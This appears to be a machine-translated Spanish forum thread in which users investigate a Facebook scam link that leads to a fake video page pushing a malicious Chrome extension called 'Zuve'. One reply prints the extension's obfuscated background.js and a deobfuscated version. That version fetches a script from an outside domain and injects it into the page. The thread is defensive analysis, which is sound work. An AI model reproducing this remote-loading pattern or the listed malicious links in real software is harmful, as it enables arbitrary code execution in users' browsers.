¿Qué tipo de “virus” de Facebook comparte el enlace a la lista de números hexadecimales?

André Borie estaba en el camino correcto. Esto parece ser una cuestión de comando y control de alguna descripción.

Mi novia tiene un enlace publicado en su página de FB y, como tenía su nombre, hizo clic en él. Esto la llevó a un sitio web con "código aleatorio", tal como lo expresó. Inmediatamente me contó sobre esto y me puse mis gafas de detective.

El enlace en cuestión era 0udfczyk [dot] videossite [dot] ga / LKbdc84n

Cuando intenté visitarlo en una máquina virtual en Chrome, me redirigió a una página de video de Facebook falsa (en fulldailyonlynews [dot] com ) con comentarios falsos y todo, y sin importar dónde hiciste clic, intenté agregar una extensión de navegador llamada " Zuve ", solicitando acceso a" Lea y cambie todos sus datos en los sitios web que visita ". Sí, no, gracias.

Enlace a extensión: https://chrome.google.com/webstore/detail/zuve/ofambggiemkoplmbdloidhlbicfcfmak

Sin embargo, cualquier visita posterior al enlace del sitio de videos no me redirigió al sitio falso de Facebook (¿Fakebook?). Simplemente me llevan al sitio de "código aleatorio" como lo describe el OP aquí y mi GF. Estos códigos (¿hashes?) Cambian con cada actualización de la página, y al limpiar todos los cachés y cookies, etc., se redireccionará a la página de Facebook falsa nuevamente (una vez).

NO he intentado instalar la extensión del navegador, pero teniendo en cuenta la evidencia, es bastante obvio que esto hará algo malicioso. Probablemente intentará (ab) usar tu cuenta de Facebook (u otras cuentas) para enviar enlaces más extraños a estas cosas.

Otros detalles:

• El enlace no parece funcionar correctamente en Firefox u Opera (al menos en mi caso no lo hizo. No hay una página de Facebook falsa, solo aparece el "código")

Capturas de pantalla:

enlace

(tuve que vincularlo con una lista de directorios ya que todavía no puedo publicar más de 2 enlaces)

Espero que esto ayude a alguien ..

Descargué esta extensión (enlace en comentario de Bambooz ) e intenté verificar qué hará. Aquí está background.js (el script de fondo se ejecuta en el proceso de extensión ):

var lsym = true;
var cmal = 24059;
var mwwe = {
    "mayeceroh": 53574,
    "avagagozave": 83706,
    "zunucog": 40507,
    "agifarig": 20915,
    "koyuci": 89453
};
var zsyt = 45095;
var pnpgnw = this;
var dkrjfv = lwawh("3pYSKX4uo37VHpmhnNFbg",1,true);
var tcqrsh = lwawh("ryY7J8Z3g74UyR2kVm.lIf",10,false);
var rjowvk = lwawh("rCBFMe=kaJkzI24kVJidHRe09_",14,false);
var rsohfd = lwawh("1X7ly4Dg",3,false);
var tanxle = lwawh("E.5gmeigdC",6,false);
pnpgnw[rsohfd](dkrjfv+tcqrsh+rjowvk)[tanxle](function(lcqbpv) {
  var yvtdn = lwawh("3wfEI2",4,true);
  if(lcqbpv[yvtdn]){
    var hqnom = lwawh("dEkiMpwwiHI2j",9,false);
    lcqbpv[hqnom]()[tanxle](function(qevtny){
      var elprl = lwawh("vqGEgmpp",5,true);
      var ulmsq = lwawh("oXBqr?m9Szs1oV29dV5Yysi/2F",11,false);
      var mpytne = pnpgnw[elprl][ulmsq](qevtny);
      var mmtry = lwawh("jtwHM2llnDGrypi",7,false);
      var vcatxl = lwawh("1ELg1KZMnDuHc4eJ_yEHN4",9,true);
      var mkebn = lwawh("gtYlUuDVoEY",5,false);
      var ghvrw = pnpgnw[mmtry][vcatxl](mkebn);
      var otpjhs = lwawh("RuIrJi6gRmk",8,true);
      ghvrw[otpjhs] = mpytne;
      var tllma = lwawh("1u9=ye:",3,false);
      var bjltd = lwawh("UuuUoNZoRkZ7KreeaBP_ef",11,true);
      pnpgnw[mmtry][tllma][bjltd](ghvrw);
    });
  }
});
function lwawh(fdnzl,xijua,xgeswl){
  var yfhfby = "uTDHJMXrk?mNoICxU_37Y:zsAnhO=SEBdfv52p9/Gab1gLlF.jt60Z4e8cViyRKP";
  var qtlobq = ["Vt\/f.4IFjAM?nDmv7p:0OPrRh=ElbkTzacSZxUsX569ugL_CK1GB8JedYiNo32yH","X5Rdn?im41Y96:BAM8PIoUtulCpVS\/vb3k7cgExfjhH2_FJON.GZTLsyeDa0zKr=","Gl1m:NguS0Ex7JRFpyCHz_ZB6OPno\/UKfsM2jh84Ai5?9bIa3LYTcXd.tkveDr=V","iJMP?pCVUBr32:OA54TvtcgFaK=ysR9nzlo\/L8.k67xZdXEjNYS0efuHG1I_bmhD","H2FkGTno1O9AIux5\/dXSZagM7Nt8.bsvJ?rVpKY0=cjRCfePD3UB6:Ey_i4mlhLz","NHC_67h825t.TzGEmIj9cXou=pg0n:1OfLKSxrlDAeRybviaPY4BM\/UVFs3k?ZJd","mOyK5gjaz0T7R?kAL9S\/cUZG3V1Xrfxs:P_.hbN4Y2lo=uFCE8itdJMeBDv6IpHn","YFb2a1RVUnrm=Bjs\/HTIc4DhxegyC5JilfZ7GkPuzoLO:p8S0X9.t6EK_MN?3dvA"];
  var oqdaom = "";
  var imzfs = 0;
  while(qtlobq[imzfs]){
    imzfs++;
  }
  var xnykx = 0;
  while(fdnzl[xnykx]){
    var liscvq = 0;
    var xpxrc = -1;
    while(yfhfby[liscvq]){
      if(yfhfby[liscvq] == fdnzl[xnykx]){
        xpxrc = liscvq;
        break;
      }
      liscvq++;
    }
    if(xpxrc >= 0){
      var rfgqzf = 0;
      var eqvzdw = -1;
      while(qtlobq[xnykx%imzfs][rfgqzf]){
        if(qtlobq[xnykx%imzfs][rfgqzf] == fdnzl[xnykx]){
          eqvzdw = rfgqzf;
          break;
        }
      rfgqzf++;
      }
      oqdaom += yfhfby[eqvzdw];
    }else{
      oqdaom += fdnzl[xnykx];
    }
    xnykx++;
  }
  var ttfrv = "";
  for(uevije=xijua;uevije<oqdaom.length;uevije++){
    ttfrv += oqdaom[uevije];
  }
  oqdaom = ttfrv;
  return oqdaom;
}
var pkqu = [
    "enedige",
    "ucosus",
    81739,
    "usurujo",
    98363,
    "ejojata",
    79813
];
var qybb = {
    "ecohididiy": 85533,
    "ajofahacer": "suvazi",
    "upasibug": 89625,
    "pugofutec": 26653,
    "lusatehiy": "getulir",
    "obesomo": "fihayopuz"
};

Fue codificado / ofuscado. Así que me confundí para obtener el código fuente de origen:

window.fetch('http://idorunuso.xyz/kebapurefod/pulagube.bg').then(function(response) {
  if (response.ok) {
    response.blob().then(function(blob) {
      var code = window.URL.createObjectURL(blob);
      var js = window.document.createElement('script');
      js.src = code;
      window.document.head.appendChild(js);
    });
  }
});

Como todos vemos, este código ejecutará un código remoto. Desafortunadamente, ese enlace devuelve un código de error 404, por lo que no puedo continuar analizando. Pero por lo que hemos visto, esto es casi un código malicioso.

Por cierto, es como la muestra de malware que analicé en 2015 .